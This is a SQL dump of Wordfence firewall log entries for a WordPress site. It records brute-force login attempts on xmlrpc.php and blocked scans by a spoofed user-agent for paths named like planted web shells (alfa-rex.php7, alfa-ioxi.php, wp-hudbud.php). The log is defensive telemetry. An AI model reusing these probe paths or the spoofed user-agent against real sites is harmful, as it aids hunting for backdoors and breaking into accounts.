(51173, 0.000000, 1712319473.840548, '\0\0\0\0\0\0\0\0\0\0ÿÿ½%Kã', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51174, 0.000000, 1712319473.776940, '\0\0\0\0\0\0\0\0\0\0ÿÿg»Dê', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51175, 0.000000, 1712319480.315776, '\0\0\0\0\0\0\0\0\0\0ÿÿŠÌ1þ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51176, 0.000000, 1712319483.040435, '\0\0\0\0\0\0\0\0\0\0ÿÿgû3Å', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51177, 0.000000, 1712319486.836270, '\0\0\0\0\0\0\0\0\0\0ÿÿ1ÍÂ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51178, 0.000000, 1712319489.858776, '\0\0\0\0\0\0\0\0\0\0ÿÿUaÔU', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51179, 0.000000, 1712319495.584427, '\0\0\0\0\0\0\0\0\0\0ÿÿ)q½A', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51180, 0.000000, 1712319508.624169, '\0\0\0\0\0\0\0\0\0\0ÿÿ»,ö', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51181, 0.000000, 1712319523.824567, '\0\0\0\0\0\0\0\0\0\0ÿÿ8º#', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50450, 1711359174.957923, 1711359174.650200, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/alfa-rex.php7', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmEtcmV4LnBocDc=","category":"brute-force","ssl":1}'),
(51929, 1712637567.278416, 1712637566.901400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-hudbud.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWh1ZGJ1ZC5waHA=","category":"brute-force","ssl":1}'),
(51993, 1712689397.635080, 1712689397.214600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50621, 1711731963.384346, 1711731962.953100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com//cjfuns.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly9jamZ1bnMucGhw","category":"brute-force","ssl":1}'),
(51877, 1712562410.213248, 1712562408.946600, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;$', 0, 403, 0, 0, 0, 'https://happythinking.com/plugins/content/apismtp/apismtp.php?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw","category":"brute-force","ssl":1}'),
(50817, 1712000477.557024, 1712000476.930700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/xmrlpc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(50609, 1711731984.400866, 1711731983.982700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com//wp-content/mari.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly93cC1jb250ZW50L21hcmkucGhw","category":"brute-force","ssl":1}'),
(50831, 1712014215.688932, 1712014215.076300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(50655, 1711731904.630244, 1711731904.158000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vZHJvcGRvd24ucGhw","category":"brute-force","ssl":1}'),
(50644, 1711731921.345110, 1711731920.951000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/plugins/seoo/alfa-ioxi.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9wbHVnaW5zL3Nlb28vYWxmYS1pb3hpLnBocA==","category":"brute-force","ssl":1}'),
(50705, 1711810296.609389, 1711810296.169200, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/applica/400.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2FwcGxpY2EvNDAwLnBocA==","category":"brute-force","ssl":1}'),
(50996, 1712208066.055545, 1712208065.441200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/ini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luaS5waHA=","category":"brute-force","ssl":1}'),
(51184, 0.000000, 1712319532.873317, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ¤¶2', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50995, 1712208085.838151, 1712208085.389900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/as.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FzLnBocA==","category":"brute-force","ssl":1}'),
(51275, 0.000000, 1712319930.452656, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿ýÀÞ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51276, 0.000000, 1712319932.926107, '\0\0\0\0\0\0\0\0\0\0ÿÿÕ9,u', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51277, 0.000000, 1712319934.227190, '\0\0\0\0\0\0\0\0\0\0ÿÿOÜ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51278, 0.000000, 1712319934.535156, '\0\0\0\0\0\0\0\0\0\0ÿÿ1–g', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51051, 1712316543.824992, 1712316543.413600, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(50999, 1712208031.142146, 1712208030.511300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/moon.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21vb24ucGhw","category":"brute-force","ssl":1}'),
(50998, 1712208043.808338, 1712208043.385900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/blog.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jsb2cucGhw","category":"brute-force","ssl":1}'),
(50997, 1712208055.999773, 1712208055.575300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/themes.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RoZW1lcy5waHA=","category":"brute-force","ssl":1}'),
(51185, 0.000000, 1712319539.949497, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+øâ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51186, 0.000000, 1712319540.845451, '\0\0\0\0\0\0\0\0\0\0ÿÿ³<¬7', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51187, 0.000000, 1712319542.245721, '\0\0\0\0\0\0\0\0\0\0ÿÿ xÔ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51188, 0.000000, 1712319545.359157, '\0\0\0\0\0\0\0\0\0\0ÿÿ~Ü', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51189, 0.000000, 1712319549.922232, '\0\0\0\0\0\0\0\0\0\0ÿÿÒ Í', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51190, 0.000000, 1712319552.141010, '\0\0\0\0\0\0\0\0\0\0ÿÿvÍ`', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51191, 0.000000, 1712319555.208055, '\0\0\0\0\0\0\0\0\0\0ÿÿxn', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51192, 0.000000, 1712319565.490533, '\0\0\0\0\0\0\0\0\0\0ÿÿ;Zœ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51193, 0.000000, 1712319577.427735, '\0\0\0\0\0\0\0\0\0\0ÿÿZqà\\', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51194, 0.000000, 1712319577.530626, '\0\0\0\0\0\0\0\0\0\0ÿÿÎ>2', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51195, 0.000000, 1712319578.130410, '\0\0\0\0\0\0\0\0\0\0ÿÿÞ¾¢', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51196, 0.000000, 1712319579.730876, '\0\0\0\0\0\0\0\0\0\0ÿÿˆž)%', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51197, 0.000000, 1712319579.859568, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯ej‚', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51198, 0.000000, 1712319585.822460, '\0\0\0\0\0\0\0\0\0\0ÿÿÊwO', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51199, 0.000000, 1712319589.464993, '\0\0\0\0\0\0\0\0\0\0ÿÿ-äÂk', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51200, 0.000000, 1712319589.731406, '\0\0\0\0\0\0\0\0\0\0ÿÿBBÈ	', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51201, 0.000000, 1712319591.472767, '\0\0\0\0\0\0\0\0\0\0ÿÿ|Ù{™', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51202, 0.000000, 1712319593.180780, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%q9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51203, 0.000000, 1712319608.312942, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ3eú', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51204, 0.000000, 1712319611.885756, '\0\0\0\0\0\0\0\0\0\0ÿÿz±mj', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51205, 0.000000, 1712319619.237346, '\0\0\0\0\0\0\0\0\0\0ÿÿ±~Ä', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51206, 0.000000, 1712319620.428410, '\0\0\0\0\0\0\0\0\0\0ÿÿuËÚ#', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
